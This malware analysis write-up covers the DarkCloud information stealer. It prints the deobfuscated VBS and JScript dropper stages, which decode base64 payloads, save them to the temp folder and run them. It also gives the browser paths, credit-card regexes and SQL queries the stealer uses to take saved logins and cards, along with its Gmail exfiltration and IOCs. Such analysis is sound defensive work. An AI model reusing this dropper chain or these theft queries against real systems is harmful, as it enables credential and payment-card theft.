DarkCloud Malware Analysis
August 7, 2025
Fuad Aliyev
Malware Analysis
Reverse Engineering
Stealer
Background
By early 2025, the cyber landscape had shifted dramatically. Digital defenses adapted quickly—but DarkCloud Stealer, a sophisticated information-stealer first seen in 2022, had quietly evolved. A new AutoIt-decoded campaign emerged in January and February 2025, targeting high-value institutions including Polish government networks and finance companies. These variants were hidden inside phishing emails and weaponized RAR archives hosted on file-sharing platforms. When victims downloaded them, an AutoIt executable delivered XOR-encrypted payloads and shellcode, eventually unlocking the DarkCloud payload in memory.
Analysis Motivation
I noticed a DarkCloud sample listed in Malware Bazaar and decided to investigate, hoping to find new malware samples.
Infection Chain
The malware flow was honestly shorter compared to other malware I've worked with.
The obfuscations were somewhat annoying but easy to deobfuscate. I would even say that the first three files used nearly the same obfuscation technique with just a few variations.
Deobfuscated Components
Stage 1: Bukti_Transfer.vbs
tJJD = <base64 data> private function qdUwPdivbxOxQqtzizZckfyGUlMwxwxjAOnruYnurq ( asxgYBeRPktTnNmMAYHDbkZtLblVPBcIKZuFtPjkkSSoYGaFXcUNDWCqTEVwQJBNHlJNThSlpWTJR ) CreateObject( Microsoft.xmldom ).createElement( "hadXkIlrRLm" ).DataType = bin.base64 CreateObject( Microsoft.xmldom ).createElement( "hadXkIlrRLm" ).Text = asxgYBeRPktTnNmMAYHDbkZtLblVPBcIKZuFtPjkkSSoYGaFXcUNDWCqTEVwQJBNHlJNThSlpWTJR qdUwPdivbxOxQqtzizZckfyGUlMwxwxjAOnruYnurq = CreateObject( Microsoft.xmldom ).createElement( "hadXkIlrRLm" ).NodeTypedValue end function Sub UabNeUPVDYZliECkFVEBrWraz( KLekuYrThvhlvnaSBAdMgwIeFscHHqncJwyLmNTlnvuijzCrYNvBZpZNDAfCwkLrHEczoPfogrZkCZvGpl , jeEhreMLGLMdeMGYfWgkxtABpCvmGCeTgnihSEifsCeAkezGlFIyOaNpeCspjaFDhswrdYGboBruPzQKCoBAufFGZtCQLsvSxaT) CreateObject( AdoDb.stream ).Type = 1 CreateObject( AdoDb.stream ).Open CreateObject( AdoDb.stream ).Write jeEhreMLGLMdeMGYfWgkxtABpCvmGCeTgnihSEifsCeAkezGlFIyOaNpeCspjaFDhswrdYGboBruPzQKCoBAufFGZtCQLsvSxaT CreateObject( AdoDb.stream ).SaveToFile KLekuYrThvhlvnaSBAdMgwIeFscHHqncJwyLmNTlnvuijzCrYNvBZpZNDAfCwkLrHEczoPfogrZkCZvGpl, 2 End Sub UabNeUPVDYZliECkFVEBrWraz CreateObject( SCRipting.filesystemobject ).getspecialfolder( 2 )\DIFqiByo.js, qdUwPdivbxOxQqtzizZckfyGUlMwxwxjAOnruYnurq(tJJD) CreateObject("WScript.Shell").Run CreateObject( SCRipting.filesystemobject ).getspecialfolder( 2 )\DIFqiByo.js
Stage 2: DIFqiByo.js
XCaAtSSXdBxcDghydxGTzrHLzvIOjsbNfwLultI = "<base64_string>"; UHYgIKAlppsqDgDwqEAhaRmVfBdoFM = new ActiveXObject("Scripting.FileSystemObject").GetSpecialFolder(2) + "\\Fexcel.xls"; function zcFEtAhLdQTEBlkhVCFKTZfScCEKhu(XwMAPAhkvmlUNbZQhAbymGZJAivpspBOpiajuMcITJZIvHICMyooIgOQWDzhEssF) { var kWeeBqWVYTecgQNsZtctBMFJUJNrMvDbRTYYdeBWcTQpBmkFpGHLPyEXRUJrdeIcQDK = new ActiveXObject("Microsoft.XMLDOM").createElement("YkNWdVKSrzJKfxvQTcyPsOPeKXzGibcGkeEdxvyxSPLiwLuBzPckzYeJUiMGWEkP"); kWeeBqWVYTecgQNsZtctBMFJUJNrMvDbRTYYdeBWcTQpBmkFpGHLPyEXRUJrdeIcQDK.dataType = "bin.base64"; kWeeBqWVYTecgQNsZtctBMFJUJNrMvDbRTYYdeBWcTQpBmkFpGHLPyEXRUJrdeIcQDK.text = XwMAPAhkvmlUNbZQhAbymGZJAivpspBOpiajuMcITJZIvHICMyooIgOQWDzhEssF; return kWeeBqWVYTecgQNsZtctBMFJUJNrMvDbRTYYdeBWcTQpBmkFpGHLPyEXRUJrdeIcQDK.nodeTypedValue; } function bNXRDryrkPSQqZsOnPvTzrgBOxheSFwpNmOLTAiCd(qXBQJWZQUiIoHxjzsqbmmhMdKDUDBGhMgdyUonWgXZkRYlKpmfJm, XeVvaZUARvxJpMkLnbYRRTEsnPiVfhxRCdUbJsGdkpxZGXttkzgaVqcEacILqzVjxgGMsIBuUvgbWemPVpkfA) { var omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu = new ActiveXObject("ADODB.Stream"); omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu.Open(); omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu.Type = 1; omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu.Write(XeVvaZUARvxJpMkLnbYRRTEsnPiVfhxRCdUbJsGdkpxZGXttkzgaVqcEacILqzVjxgGMsIBuUvgbWemPVpkfA); omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu.Position = 0; omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu.SaveToFile(qXBQJWZQUiIoHxjzsqbmmhMdKDUDBGhMgdyUonWgXZkRYlKpmfJm, 2); omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu.Close(); } bNXRDryrkPSQqZsOnPvTzrgBOxheSFwpNmOLTAiCd(new ActiveXObject("Scripting.FileSystemObject").GetSpecialFolder(2) + "\\adobe.js", zcFEtAhLdQTEBlkhVCFKTZfScCEKhu(XCaAtSSXdBxcDghydxGTzrHLzvIOjsbNfwLultI)); bNXRDryrkPSQqZsOnPvTzrgBOxheSFwpNmOLTAiCd(UHYgIKAlppsqDgDwqEAhaRmVfBdoFM, zcFEtAhLdQTEBlkhVCFKTZfScCEKhu(hwEGxbBGnBNdYyRQfv)); new ActiveXObject("WScript.Shell").Run(new ActiveXObject("Scripting.FileSystemObject").GetSpecialFolder(2) + "\\adobe.js"); new ActiveXObject("WScript.Shell").Run(UHYgIKAlppsqDgDwqEAhaRmVfBdoFM);
Stage 3: adobe.js
WjfOMggRpJFcoITKXbCPawOtniqPc = "<base64_string>"; FTRROHYpgXUatWipcLjFwD = new ActiveXObject("Scripting.FileSystemObject").GetSpecialFolder(2) + "\\JReSz.exe"; function OMqNgoRrQmsuhTxuvdFrvfHuKGQdzBpDyYbuX(TBJfBLfbmhXlhPMXgVClficsWQbhEjZbcsSumKHnCpSkrqXwbpwriWYlZQIlkyXDHvJpwRkV) { OOjqQrBfteGPmisFThUVBVDEROdvhiAJFacUnhUhPdsGrIQYDDVOxPTsLfYBOFyKewKMGYSlNmFYdxMJy.dataType = "bin.base64"; OOjqQrBfteGPmisFThUVBVDEROdvhiAJFacUnhUhPdsGrIQYDDVOxPTsLfYBOFyKewKMGYSlNmFYdxMJy.text = TBJfBLfbmhXlhPMXgVClficsWQbhEjZbcsSumKHnCpSkrqXwbpwriWYlZQIlkyXDHvJpwRkV; return OOjqQrBfteGPmisFThUVBVDEROdvhiAJFacUnhUhPdsGrIQYDDVOxPTsLfYBOFyKewKMGYSlNmFYdxMJy.nodeTypedValue; } YnBjXqSbajJqZKnFLbqmzukQhfjfnCSHtrtEGgdmBrmzcGcMFNQSnfZdCkCsGnnYRCxiQiyfxEkIIkoaDWZalzUNRQCWdlfODOiaJtvWOlUivRURvcojONmRijQzgcCMYVEtCNRJbCLAflRAvkaBwvApcQsZdvqmjIKZMbPiKfILCmmwRQEwCAPcVORlVrffMYRXa = "ADODB.Stream"; function rtSfknqMMIEJPdLbCDSclKEBnUBxRfpHOTAFjGXKhbEnYoSLuTG(aXosOwpwIrDWqJoZgXjEdivCGfHNVNrobCstdWtbAkPcXWgYACeLWsZrbmmiobauzOvoQvwKeHDsTSfjzjNTjgSjcBRrkKnZKVcIbrHFGThPohYJHDjFOGKTwMLPdEZTTdiypWHHbHMPyDuvcIkhbhLDKJMPgsbBuNvKyaTkvbeGtvVsRQ, vakSaKwgseLrCHtcjbJLBqSjyqiuKjUBKOgoZZUTUqjKuJMgEpupYaSFHATkbCWIKKhnaFDKHprLHHppdCpUpedkwbgYFksSUaAkbYFyljiijGyALdGZMBSfhxrzZfEWxYrgHENFwriFvuApcfMbdTGSHUDdhGYGfLlKPSsHQBcUTNjmwBWtSctdRY) { AXEEvxGTXPJFlzYrAkKSGnZubEInXaEOndQuGKKQVHazrDSJppVGAxoMyJdroSwxKvRHielpZtwzNZDYlyyhEyNqpDwxhTcCLcpvlKbLEfgGApzYFEFpUOtMhbSfhnIFRtolkHmbXncYRHqAEXrcNmiwicOKrvdQXbpGBOoxSeRhmU.Open(); AXEEvxGTXPJFlzYrAkKSGnZubEInXaEOndQuGKKQVHazrDSJppVGAxoMyJdroSwxKvRHielpZtwzNZDYlyyhEyNqpDwxhTcCLcpvlKbLEfgGApzYFEFpUOtMhbSfhnIFRtolkHmbXncYRHqAEXrcNmiwicOKrvdQXbpGBOoxSeRhmU.Type = 1; AXEEvxGTXPJFlzYrAkKSGnZubEInXaEOndQuGKKQVHazrDSJppVGAxoMyJdroSwxKvRHielpZtwzNZDYlyyhEyNqpDwxhTcCLcpvlKbLEfgGApzYFEFpUOtMhbSfhnIFRtolkHmbXncYRHqAEXrcNmiwicOKrvdQXbpGBOoxSeRhmU.Write(vakSaKwgseLrCHtcjbJLBqSjyqiuKjUBKOgoZZUTUqjKuJMgEpupYaSFHATkbCWIKKhnaFDKHprLHHppdCpUpedkwbgYFksSUaAkbYFyljiijGyALdGZMBSfhxrzZfEWxYrgHENFwriFvuApcfMbdTGSHUDdhGYGfLlKPSsHQBcUTNjmwBWtSctdRY); AXEEvxGTXPJFlzYrAkKSGnZubEInXaEOndQuGKKQVHazrDSJppVGAxoMyJdroSwxKvRHielpZtwzNZDYlyyhEyNqpDwxhTcCLcpvlKbLEfgGApzYFEFpUOtMhbSfhnIFRtolkHmbXncYRHqAEXrcNmiwicOKrvdQXbpGBOoxSeRhmU.Position = 0; AXEEvxGTXPJFlzYrAkKSGnZubEInXaEOndQuGKKQVHazrDSJppVGAxoMyJdroSwxKvRHielpZtwzNZDYlyyhEyNqpDwxhTcCLcpvlKbLEfgGApzYFEFpUOtMhbSfhnIFRtolkHmbXncYRHqAEXrcNmiwicOKrvdQXbpGBOoxSeRhmU.SaveToFile(aXosOwpwIrDWqJoZgXjEdivCGfHNVNrobCstdWtbAkPcXWgYACeLWsZrbmmiobauzOvoQvwKeHDsTSfjzjNTjgSjcBRrkKnZKVcIbrHFGThPohYJHDjFOGKTwMLPdEZTTdiypWHHbHMPyDuvcIkhbhLDKJMPgsbBuNvKyaTkvbeGtvVsRQ, 2); AXEEvxGTXPJFlzYrAkKSGnZubEInXaEOndQuGKKQVHazrDSJppVGAxoMyJdroSwxKvRHielpZtwzNZDYlyyhEyNqpDwxhTcCLcpvlKbLEfgGApzYFEFpUOtMhbSfhnIFRtolkHmbXncYRHqAEXrcNmiwicOKrvdQXbpGBOoxSeRhmU.Close(); } rtSfknqMMIEJPdLbCDSclKEBnUBxRfpHOTAFjGXKhbEnYoSLuTG(FTRROHYpgXUatWipcLjFwD, OMqNgoRrQmsuhTxuvdFrvfHuKGQdzBpDyYbuX(WjfOMggRpJFcoITKXbCPawOtniqPc)); bEXBUtvehdQuFvkqQVWhBuEzKZZUlaeqRp = new ActiveXObject("Wscript.Shell"); bEXBUtvehdQuFvkqQVWhBuEzKZZUlaeqRp.Run(FTRROHYpgXUatWipcLjFwD);
Final Payload: Visual Basic Executable
Finally, adobe.js drops a Visual Basic v5.0 compiled 32-bit binary that serves as a stealer, keylogger, and logger.
Data Theft Capabilities
The malware steals data from the following sources:
Browser-Related Data
| Browser Profiles |
|---|
| \Google\Chrome\User Data |
| \Opera Software\Opera Stable |
| \Yandex\YandexBrowser\User Data |
| \360Chrome\Chrome\User Data |
| \Comodo\Dragon\User Data |
| \MapleStudio\ChromePlus\User Data |
| \Chromium\User Data |
| \Torch\User Data |
| \Epic Privacy Browser\User Data |
| \BraveSoftware\Brave-Browser\User Data |
| \Iridium\User Data |
| \7Star\7Star\User Data |
| \Amigo\User Data |
| \CentBrowser\User Data |
| \Chedot\User Data |
| \CocCoc\Browser\User Data |
| \Elements Browser\User Data |
| \Kometa\User Data |
| \Orbitum\User Data |
| \Sputnik\Sputnik\User Data |
| \uCozMedia\Uran\User Data |
| \Vivaldi\User Data |
| \Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer |
| \CatalinaGroup\Citrio\User Data |
| \Coowon\Coowon\User Data |
| \liebao\User Data |
| \QIP Surf\User Data |
| \Microsoft\Edge\User Data |
| \Mozilla\Firefox\Profiles |
| \Waterfox\Profiles |
| \K-Meleon\Profiles |
| \Thunderbird\Profiles |
| \Comodo\IceDragon\Profiles |
| \8pecxstudios\Cyberfox\Profiles |
| \NETGATE Technologies\BlackHawK\Profiles |
| \Moonchild Productions\Pale Moon\Profiles |
Credit Card Data Patterns
The malware searches for credit card information using regular expressions for various card types:
| Card Type | Regular Expression Pattern |
|---|---|
| Amex Card | ^389[0-9]{11}$ |
| Carte Blanche Card | ^(6541|6556)[0-9]{12}$ |
| Diners Club Card | ^3(?:0[0-5]|[68][0-9])[0-9]{11}$ |
| Discover Card | 6(?:011|5[0-9]{2})[0-9]{12}$ |
| Insta Payment Card | ^63[7-9][0-9]{13}$ |
| JCB Card | ^(?:2131|1800|35\d{3})\d{11}$ |
| Korean Local Card | ^9[0-9]{15}$ |
| Laser Card | ^(6304|6706|6709|6771)[0-9]{12,15}$ |
| Maestro Card | ^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$ |
| Mastercard | 5[1-5][0-9]{14}$ |
| Express Card | 3[47][0-9]{13}$ |
| Solo Card | ^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$ |
| Union Pay Card | ^(62[0-9]{14,17})$ |
| Visa Card | 4[0-9]{12}(?:[0-9]{3})?$ |
| Visa Master Card | ^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$ |
| Switch Card | ^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$ |
Database Queries
The malware uses MySQL queries to extract data from browser databases:
SELECT origin_url, username_value, password_value, length(password_value) FROM logins SELECT origin_url, username_value, password_value FROM logins SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Network Communication
- IP Resolution: Uses showip.net to determine the victim's IP address
- Data Exfiltration: Uses smtp.gmail.com service to send stolen data to "Williamsaustin2099@gmail.com"
Key Findings
- Multi-stage Infection: The malware uses a three-stage dropper chain (VBS → JS → JS → EXE)
- Base64 Obfuscation: All stages use Base64 encoding with variable name obfuscation
- Comprehensive Browser Support: Targets over 30 different browsers and browser variants
- Credit Card Detection: Uses sophisticated regex patterns to identify various credit card types
- Gmail Exfiltration: Uses legitimate Gmail SMTP servers for data exfiltration
- Legacy Technology: Final payload is compiled in Visual Basic v5.0
Indicators of Compromise (IOCs)
Email Addresses:
- Williamsaustin2099@gmail.com (data exfiltration)
Network Indicators:
- showip.net (IP resolution service)
- smtp.gmail.com (data exfiltration)
File Names:
- Bukti_Transfer.vbs
- DIFqiByo.js
- adobe.js
- Fexcel.xls
- JReSz.exe
Note: The VB binary was uploaded by JAMESWT_WT (2025-08-01) before my analysis, most likely a different case but the same malware family used for stealing and logging purposes.